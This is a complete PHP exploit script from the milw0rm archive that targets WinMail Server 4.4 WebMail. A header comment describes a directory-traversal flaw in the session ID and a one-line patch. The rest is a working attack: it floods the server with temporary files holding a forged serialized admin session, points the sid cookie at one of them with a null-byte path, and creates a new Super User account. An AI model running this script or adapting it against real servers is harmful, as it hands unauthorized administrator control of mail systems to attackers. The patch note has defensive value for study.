<?php
/* WinMail Server 4.4 build 1124 (WebMail) remote add new Super User exploit
* by rgod
*
* software site: http://www.magicwinmail.net/download.asp
*
*
* vulnerable code in /inc/class.session.php at lines 8-25:
* ...
* function Load() {
* $result = Array();
*
* $sessionfile = $this->temp_folder."_sessions/".$this->sid.".sess";
* if(!file_exists($sessionfile))
* return false;
*
* $size = filesize($sessionfile);
*
* $fp = fopen($sessionfile, "rb");
* if ($fp){
* $result = fread($fp, $size);
* fclose($fp);
* }
* $result = unserialize(base64_decode($result));
*
* return $result;
* }
* ...
*
* This function should check for session files located in /temp/_sessions
* folder outside of the www path. But the "sid" argument is not checked
* for directory traversal attacks. So you can supply a path to an arbitrary
* file, ex: a temporary uploaded file with well crafted content.
*
* phpinfo() shows that the value for upload_tmp_dir is not set, so the folder
* used to store this files becomes /windows/temp or /winnt/temp.
*
* also magic_quotes_gpc = off and open_basedir is not set, so...
*
* http://target:6080/admin/main.php?sid=../../../../../../windows/temp/phpFFFF.tmp%00
*
* set the magicwinmail_session_id cookie to the same value and you will have admin
* access!
*
* This script uploads a large amount of temporary files to quickly reach
* the ffff index and quickly call the main script before the temporary file is deleted
* to set a new Super User account.
*
* Possible patch:
*
* ...
* $sessionfile = $this->temp_folder."_sessions/".basename($this->sid).".sess";
* ...
*
*/
if ($argc<2) {
print_r('
Usage: php '.$argv[0].' host OPTIONS
host: target server (ip/hostname)
Options:
-p[port]: specify a port other than 6080
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost -P1.1.1.1:8080
php '.$argv[0].' localhost -p81
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function send($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],(int)$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function sendii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex, $ssock;
if ($proxy=='') {
$ssock=fsockopen(gethostbyname($host),$port);
if (!$ssock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ssock=fsockopen($parts[0],$parts[1]);
if (!$ssock) {
echo 'No response from proxy...';die;
}
}
fputs($ssock,$packet);
}
$host=$argv[1];
$path=$argv[2];
$port=6080;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
$____suntzu=array();
$____suntzu["user"]="admin";
$____suntzu["pass"]="suntzu";
$____suntzu["usertype"]="0";
$____suntzu["adminrange"]="";
$____suntzu["auth"]="1";
$____suntzu["start"]="9999999999";
$____suntzu["initconfig"]["mailstore_directory"]="C:\\";
$____suntzu["initconfig"]["netstore_driectory"]="C:\\";
$____suntzu["initconfig"]["postmaster_address"]="postmaster@server.com";
$____suntzu["initconfig"]["congratulate_subject"]="welcome";
$____suntzu["initconfig"]["congratulate_content"]="hi";
$____suntzu["initconfig"]["ldap_base_dn"]="o=magicwinmail";
$____suntzu["initconfig"]["ldap_root_dn"]="o=magicwinmail";
$____suntzu["initconfig"]["ldap_root_pwd"]="9999999999";
$____suntzu["initconfig"]["allow_webadmin"]="1";
$____suntzu["initconfig"]["idle_timeout"]="1800";
$____suntzu["initconfig"]["enable_cookies"]="";
$____suntzu["initconfig"]["smtp_server"]="127.0.0.1";
$____suntzu["initconfig"]["smtp_port"]="25";
$____suntzu["initconfig"]["ldap_server"]="127.0.0.1";
$____suntzu["initconfig"]["ldap_port"]="309";
$____suntzu["initconfig"]["register_user_total"]="20";
$____suntzu["mainpage"]="1";
$____suntzu["accountstatus"]="2";
$____suntzu["expiretime"]="2592000";
$____suntzu["searchtype"]="";
$my_magic_string=serialize($____suntzu);
$my_magic_string=base64_encode($my_magic_string);
echo "magic string -> ".$my_magic_string."\n";
//fill with possible locations
$my_path=array("../../../../../../winnt/temp/",
"../../../../../../windows/temp/",
"../../../../../winnt/temp/",
"../../../../../windows/temp/");
$my_file="phpFFFF.tmp"; //change, if u want
$my_admin="akira";
$my_pass="akira";
$my_retries=9999;
echo "Please wait ...\n";
for ($j=0; $j<count($my_path); $j++){
for ($i=0; $i<$my_retries; $i++){
$data="";
for ($k=1; $k<=999; $k++){
$data.="-----------------------------7d6224c08dc\n".
"Content-Disposition: form-data; name=\"suntzu[$i][$k]\"; filename=\"suntzoi$i$k\";\n\n".
$my_magic_string."\n";
}
$data.="-----------------------------7d6224c08dc--\n";
$packet="POST /admin/main.php HTTP/1.1\r\n". //a time consuming script
"Host: ".$host."\r\n".
"Accept: text/plain\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n".
"Content-Length: ".strlen($data)."\r\n".
"Connection: Keep-Alive\r\n\r\n".
$data;
sendii($packet);
$sid=urlencode($my_path[$j].$my_file."\x00");
$data="dest=adminuser".
"&sub_action=added".
"&sid=$sid".
"&lid=0".
"&tid=0".
"&adminrange=".
"&oldpassword=".
"&username=".urlencode($my_admin).
"&password=".urlencode($my_pass).
"&confirmpwd=".urlencode($my_pass).
"&description=suntzuuuuu".
"&usertype=0H";
$packet="POST /admin/main.php HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n".
"Referer: http://$host:$port/admin/main.php\r\n".
"Accept-Language: it\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: text/plain\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n".
"Host: $host:$port\r\n".
"Content-Length: ".strlen($data)."\r\n".
"Connection: Close\r\n".
"Cache-Control: no-cache".
"Cookie: magicwinmail_session_id=$sid; magicwinmail_admin_default_theme=admindefault; magicwinmail_admin_default_language=en; magicwinmail_admin_default_domain=server.com; magicwinmail_default_theme=default; magicwinmail_default_language=en; magicwinmail_domain_name=server.com; magicwinmail_login_userid=postmaster\r\n\r\n".
$data;
send($packet);
fclose($ssock);
$data="f_user=".urlencode($my_admin).
"&f_pass=".urlencode($my_pass).
"&lng=0".
"&sid=".
"&tid=".
"&dest=login";
$packet="POST /admin/login.php HTTP/1.0\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n".
"Referer: http://$host:$port/admin/login.php\r\n".
"Accept-Language: en\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n".
"Host: $host:$port\r\n".
"Content-Length: ".strlen($data)."\r\n".
"Pragma: no-cache\r\n".
"Cookie: magicwinmail_admin_default_theme=admindefault; magicwinmail_admin_default_language=en; magicwinmail_admin_default_domain=server.com; magicwinmail_default_theme=default; magicwinmail_default_language=en; magicwinmail_domain_name=server.com; magicwinmail_login_userid=postmaster\r\n".
"Connection: Close\r\n\r\n".
$data;
send($packet);
if (!eregi("badlogin",$html)){die("Done! Login to the admin panel with username \"$my_admin\" and pass \"$my_pass\"\n");}
}
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2007-04-01]